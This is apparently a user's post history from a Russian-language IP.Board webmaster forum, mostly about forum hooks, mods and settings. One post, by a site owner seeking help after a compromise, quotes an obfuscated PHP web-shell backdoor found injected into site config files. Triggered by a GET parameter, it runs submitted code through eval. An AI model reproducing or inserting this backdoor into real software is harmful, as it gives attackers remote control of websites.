HooLIGUN

Мне кажется или это переделанный Baisik ?

Нашел логи в папке с юзера (меня) 31.133.47.233 Вот эта тварь ко мне ломилась Ух я зол

Эх..тут ничего не нашел...

хах гениально

Теперь зараженные файлы еще искать...

Только им и пользуюсь. Сейчас буду менять. А не подскажешь где можно посмотреть логи? А то я незнаю где они находятся на vds`e

Привет всем.Сегодня приехал домой,зашел на свои сайты,и на одном из них была ошибка Решил заглянуть в этот файл и увидел строчку if(isset($_GET[w1111t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d); } Ладно. Также на некоторых сайтах появился файл wp-conf.php с содержанием: код слишком большой,прикреплю файл wp-conf.php Файл был загружен сегодня 3 часа назад... Что это такое? И как с этим бороться??? upd#: На всех сайтах в конфигурационных файлах (на разных сайтах) добавлена подобная строчка и лежит этот файл wp-conf.php (аваст на него ругается) if(isset($_GET[w9345t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d); }

No avatar можно тоже в стиле логотипа сделать :)

Это я видел...ну раз нет,закрывайте

И они ставятся автоматически? Или же юзер сам выбирает флаг из списка?

Остряк

Respected, Нашел как отключить сетевой экран,и зашел. Антивирус не пускает. Сначало ругался на какие то изображения,а теперь просто на ссылку __ipbmafia.ru/

Вот как раз собираюсь его устанавливать... Если не отпишусь...значит не пускает...

Как я не жалею что остался на 3.3.4

Да странно..попробывал у тебя и у себя вставить одно и тоже видео...У меня работает,у тебя нет..

Незачто.Дай скрин когда устаовишь установишь,а то я не прикрепил..

Название: Harlem Shake 1.1 Добавил: HooLIGUN Добавлен: 23 Фев 2013 Категория: Хуки, Модификации для IP.Board Название по-русски : Harlem Shake Версия IP.Board: 3.4.х Хук добавит в футер вашего сайта некую кнопку,при нажатии на которую,на вашем сайте случиться "Harlem Shake"

Кому нужен,могу залить хук для ipb , который добавляют кнопку активации такой "взбучки" для сайта + этот трек...

Happy BirthDay

devil789,Это называется горизонтальный , вбей в поиск гугла над чатом,где то видел такую статейку.

,Ну и мне.Погляжу что там...

Нехочу создавать новую тему,нашел более похожую.. Как сделать чтобы робот яндекса отображался в списке юзеров не как гость,а как Yandex . ( Google же отображается ) раньше как то делал,но после обновления форума,все настройки сбились

Вот и выложили в паблик...Почему не работает? Если все правильно делать,то всё работает (пример у меня в подписи)